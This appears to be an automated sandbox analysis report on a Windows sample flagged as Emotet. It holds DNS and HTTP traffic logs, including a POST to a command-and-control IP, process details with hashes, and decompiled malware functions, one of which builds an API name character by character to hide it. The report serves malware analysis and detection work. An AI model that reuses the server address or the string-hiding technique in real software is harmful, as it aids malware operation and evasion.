Jul 7, 2021 14:27:40.507018089 CEST	64267	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:27:40.557048082 CEST	53	64267	8.8.8.8	192.168.2.6
Jul 7, 2021 14:27:41.761142015 CEST	49448	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:27:41.819611073 CEST	53	49448	8.8.8.8	192.168.2.6
Jul 7, 2021 14:27:41.922408104 CEST	60342	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:27:41.977720976 CEST	53	60342	8.8.8.8	192.168.2.6
Jul 7, 2021 14:27:43.042402029 CEST	61346	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:27:43.088535070 CEST	53	61346	8.8.8.8	192.168.2.6
Jul 7, 2021 14:27:43.655246973 CEST	51774	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:27:43.711442947 CEST	53	51774	8.8.8.8	192.168.2.6
Jul 7, 2021 14:27:44.245121956 CEST	56023	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:27:44.290967941 CEST	53	56023	8.8.8.8	192.168.2.6
Jul 7, 2021 14:27:45.490843058 CEST	58384	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:27:45.548391104 CEST	53	58384	8.8.8.8	192.168.2.6
Jul 7, 2021 14:27:59.854686022 CEST	60261	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:27:59.905931950 CEST	53	60261	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:01.017214060 CEST	56061	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:01.075472116 CEST	53	56061	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:02.243323088 CEST	58336	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:02.291774035 CEST	53	58336	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:03.070272923 CEST	53781	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:03.127779007 CEST	53	53781	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:04.047987938 CEST	54064	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:04.103887081 CEST	53	54064	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:05.440121889 CEST	52811	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:05.501179934 CEST	53	52811	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:07.421076059 CEST	55299	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:07.470745087 CEST	53	55299	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:09.889128923 CEST	63745	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:09.935317039 CEST	53	63745	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:11.216809034 CEST	50055	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:11.271716118 CEST	53	50055	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:12.796066999 CEST	61374	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:12.845235109 CEST	53	61374	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:13.562978029 CEST	50339	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:13.611790895 CEST	53	50339	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:14.805711985 CEST	63307	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:14.859836102 CEST	53	63307	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:15.750719070 CEST	49694	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:15.799906015 CEST	53	49694	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:17.253252029 CEST	54982	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:17.318249941 CEST	53	54982	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:36.005073071 CEST	50010	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:36.063030958 CEST	53	50010	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:36.680371046 CEST	63718	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:36.736489058 CEST	53	63718	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:36.968485117 CEST	62116	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:37.026374102 CEST	53	62116	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:37.476521015 CEST	63816	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:37.537182093 CEST	53	63816	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:37.989124060 CEST	55014	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:38.044928074 CEST	53	55014	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:38.662561893 CEST	62208	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:38.718909979 CEST	53	62208	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:39.235913038 CEST	57574	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:39.286719084 CEST	53	57574	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:39.859911919 CEST	51818	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:39.914607048 CEST	53	51818	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:40.705108881 CEST	56628	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:40.760854959 CEST	53	56628	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:41.942483902 CEST	60778	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:42.004492998 CEST	53	60778	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:42.462431908 CEST	53799	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:42.524993896 CEST	53	53799	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:51.923923016 CEST	54683	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:51.987834930 CEST	53	54683	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:53.545835018 CEST	59329	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:53.602031946 CEST	53	59329	8.8.8.8	192.168.2.6
Jul 7, 2021 14:28:55.780323982 CEST	64021	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:28:55.843420982 CEST	53	64021	8.8.8.8	192.168.2.6
Jul 7, 2021 14:29:12.436503887 CEST	56129	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:29:12.494874001 CEST	53	56129	8.8.8.8	192.168.2.6
Jul 7, 2021 14:29:26.754261017 CEST	58177	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:29:26.825819016 CEST	53	58177	8.8.8.8	192.168.2.6
Jul 7, 2021 14:29:28.951379061 CEST	50700	53	192.168.2.6	8.8.8.8
Jul 7, 2021 14:29:29.013977051 CEST	53	50700	8.8.8.8	192.168.2.6

HTTP Request Dependency Graph

142.44.137.67:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49731	142.44.137.67	443	C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe

Timestamp	kBytes transferred	Direction	Data
Jul 7, 2021 14:28:32.245615959 CEST	1304	OUT	POST /DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/ HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------80lhrKDVYliktvcpjgmL9 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 142.44.137.67:443 Content-Length: 4612 Connection: Keep-Alive Cache-Control: no-cache
Jul 7, 2021 14:28:32.383486032 CEST	1309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Wed, 07 Jul 2021 12:28:32 GMT Content-Type: text/html Content-Length: 666 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: NWMEaRqF7s.exe PID: 2944 Parent PID: 5864

General

Start time:	14:27:48
Start date:	07/07/2021
Path:	C:\Users\user\Desktop\NWMEaRqF7s.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\NWMEaRqF7s.exe'
Imagebase:	0x400000
File size:	352256 bytes
MD5 hash:	0BA53DBED762655999BD37A1D8BEE9DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.347473341.0000000002244000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.347079722.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: dot3hc.exe PID: 5536 Parent PID: 2944

General

Start time:	14:27:49
Start date:	07/07/2021
Path:	C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe
Imagebase:	0x400000
File size:	352256 bytes
MD5 hash:	0BA53DBED762655999BD37A1D8BEE9DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.615086404.00000000022E4000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 5976 Parent PID: 560

General

Start time:	14:27:56
Start date:	07/07/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5604 Parent PID: 560

General

Start time:	14:28:16
Start date:	07/07/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4752 Parent PID: 560

General

Start time:	14:28:25
Start date:	07/07/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5408 Parent PID: 560

General

Start time:	14:28:33
Start date:	07/07/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 2176 Parent PID: 560

General

Start time:	14:29:08
Start date:	07/07/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: NWMEaRqF7s.exe PID: 2944 Parent PID: 5864 NWMEaRqF7s.exeCOMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	21.7%
Signature Coverage:	15.7%
Total number of Nodes:	980
Total number of Limit Nodes:	97

Executed Functions

Function 00404142, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00404142(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				int _t129;
				int _t130;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x443590; // 0xa920217c
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E0041F6EA(E00431C66, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E004038EB, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *(_t181 - 0x34) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *(_t181 - 0x30) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E0041FD26( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *(_t181 - 0x34) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *(_t181 - 0x30) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					_t129 = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164); // executed
					 *(_t181 - 0x34) = _t129;
					_t130 = ConvertDefaultLocale( *(_t181 - 0x1c)); // executed
					 *(_t181 - 0x30) = _t130;
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x400000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E0041F330(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x400000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E00403901(_t181 - 0x3c, 0x400000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E004039B1(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E004039E7(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E00403FD8(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E00403F0B(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]); // executed
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E0041E5DF(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

0x00404142
0x00404143
0x00404149
0x0040414d
0x00404154
0x0040415a
0x00404161
0x00404172
0x00404179
0x0040417c
0x0040417f
0x00404182
0x00404190
0x00404193
0x00404197
0x00404265
0x00404321
0x00404325
0x00404339
0x0040433c
0x00404346
0x0040434c
0x00404364
0x00404370
0x00404375
0x00404378
0x00404378
0x00404346
0x0040426b
0x0040427f
0x0040428a
0x004042a0
0x004042af
0x004042c7
0x004042cc
0x004042d2
0x004042de
0x004042e1
0x004042f3
0x004042ff
0x00404304
0x00404307
0x00404307
0x004042d2
0x00404311
0x00404311
0x0040428a
0x0040419d
0x004041a5
0x004041a8
0x004041ab
0x004041bd
0x004041c6
0x004041c9
0x004041ce
0x004041d1
0x004041db
0x004041de
0x004041e5
0x004041e9
0x004041ed
0x004041f0
0x004041f3
0x00404200
0x0040420c
0x00404211
0x00404214
0x00404214
0x0040421b
0x0040421b
0x00404220
0x00404223
0x0040423a
0x00404241
0x00404250
0x00404386
0x0040438d
0x0040439d
0x004043a0
0x004043a3
0x004043aa
0x004043ad
0x004043b4
0x004043c0
0x004043ca
0x004043cf
0x004043cf
0x004043d4
0x004043d9
0x004043f6
0x004043f6
0x004043fd
0x00404402
0x00000000
0x004043db
0x004043db
0x004043e2
0x004043ea
0x00000000
0x00000000
0x004043ec
0x004043f0
0x00000000
0x00000000
0x00000000
0x004043f2
0x004043f4
0x00000000
0x004043f4
0x00404256
0x00404256
0x00404404
0x00404407
0x0040440f
0x00404410
0x00404411
0x00404426
0x00404426

APIs

__EH_prolog3.LIBCMT ref: 00404161
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 00404182
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00404193
ConvertDefaultLocale.KERNELBASE(?), ref: 004041C9
ConvertDefaultLocale.KERNELBASE(?), ref: 004041D1
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 004041E5
ConvertDefaultLocale.KERNEL32(?), ref: 00404209
ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040420F
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00404248
GetVersion.KERNEL32 ref: 0040425D
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00404282
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 004042A7
_sscanf.LIBCMT ref: 004042C7
ConvertDefaultLocale.KERNEL32(?), ref: 004042FC
ConvertDefaultLocale.KERNEL32(74784EE0), ref: 00404302
RegCloseKey.ADVAPI32(?), ref: 00404311
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00404321
EnumResourceLanguagesA.KERNEL32 ref: 0040433C
ConvertDefaultLocale.KERNEL32(?), ref: 0040436D
ConvertDefaultLocale.KERNEL32(74784EE0), ref: 00404373
_memset.LIBCMT ref: 0040438D

Strings

GetSystemDefaultUILanguage, xrefs: 004041D3
kernel32.dll, xrefs: 00404174
ntdll.dll, xrefs: 0040431C
Control Panel\Desktop\ResourceLocale, xrefs: 00404275
GetUserDefaultUILanguage, xrefs: 0040418A

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: f08d9e5c1f063fad43e3bac39308fc273327a62577f739e3d1c5777cca01ddae
Instruction ID: 73e1e2af98abfcea5160a2e7c85213876d0caf47e62fbe05c0c2028d5027c9cb
Opcode Fuzzy Hash: f08d9e5c1f063fad43e3bac39308fc273327a62577f739e3d1c5777cca01ddae
Instruction Fuzzy Hash: A1814CB1E002199BCB10DFA5DC45AFEBBB8EB98304F10052BF955F3280DB789A45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00401D20, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 33%

			E00401D20(void* __eflags) {
				_Unknown_base(*)()* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				CHAR* _v100;
				void* _t37;

				_v92 = 0x43;
				_v88 = 0x72;
				_v84 = 0x79;
				_v80 = 0x70;
				_v76 = 0x74;
				_v72 = 0x41;
				_v68 = 0x63;
				_v64 = 0x71;
				_v60 = 0x75;
				_v56 = 0x69;
				_v52 = 0x72;
				_v48 = 0x65;
				_v44 = 0x43;
				_v40 = 0x6f;
				_v36 = 0x6e;
				_v32 = 0x74;
				_v28 = 0x65;
				_v24 = 0x78;
				_v20 = 0x74;
				_v16 = 0x41;
				_t21 =  &_v92; // 0x43
				_v100 = E00401CC0(__eflags, _t21, 0x14);
				_v8 = 0;
				_v8 = GetProcAddress(LoadLibraryW(L"ADVAPI32.DLL"), _v100);
				_v96 = 0;
				_push(0);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v96); // executed
				if(_v8() != 0) {
					_t37 = _v8( &_v96, 0, 0, 1, 8);
					__eflags = _t37;
					if(_t37 != 0) {
						return 1;
					}
					return 0;
				}
				return 0;
			}

0x00401d26
0x00401d2d
0x00401d34
0x00401d3b
0x00401d42
0x00401d49
0x00401d50
0x00401d57
0x00401d5e
0x00401d65
0x00401d6c
0x00401d73
0x00401d7a
0x00401d81
0x00401d88
0x00401d8f
0x00401d96
0x00401d9d
0x00401da4
0x00401dab
0x00401db4
0x00401dc0
0x00401dc3
0x00401de0
0x00401de3
0x00401dea
0x00401dec
0x00401dee
0x00401df0
0x00401df5
0x00401dfb
0x00401e0d
0x00401e10
0x00401e12
0x00000000
0x00401e18
0x00000000
0x00401e14
0x00000000

APIs

Part of subcall function 00401CC0: _malloc.LIBCMT ref: 00401CCA

LoadLibraryW.KERNEL32(ADVAPI32.DLL,?), ref: 00401DD3
GetProcAddress.KERNEL32(00000000), ref: 00401DDA

Strings

u, xrefs: 00401D5E
A, xrefs: 00401DAB
r, xrefs: 00401D6C
t, xrefs: 00401D8F
x, xrefs: 00401D9D
c, xrefs: 00401D50
e, xrefs: 00401D96
n, xrefs: 00401D88
i, xrefs: 00401D65
C, xrefs: 00401D7A
e, xrefs: 00401D73
ADVAPI32.DLL, xrefs: 00401DCE
t, xrefs: 00401DA4
CryptAcquireContextA, xrefs: 00401DB4, 00401DB7
o, xrefs: 00401D81
A, xrefs: 00401D49
q, xrefs: 00401D57

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
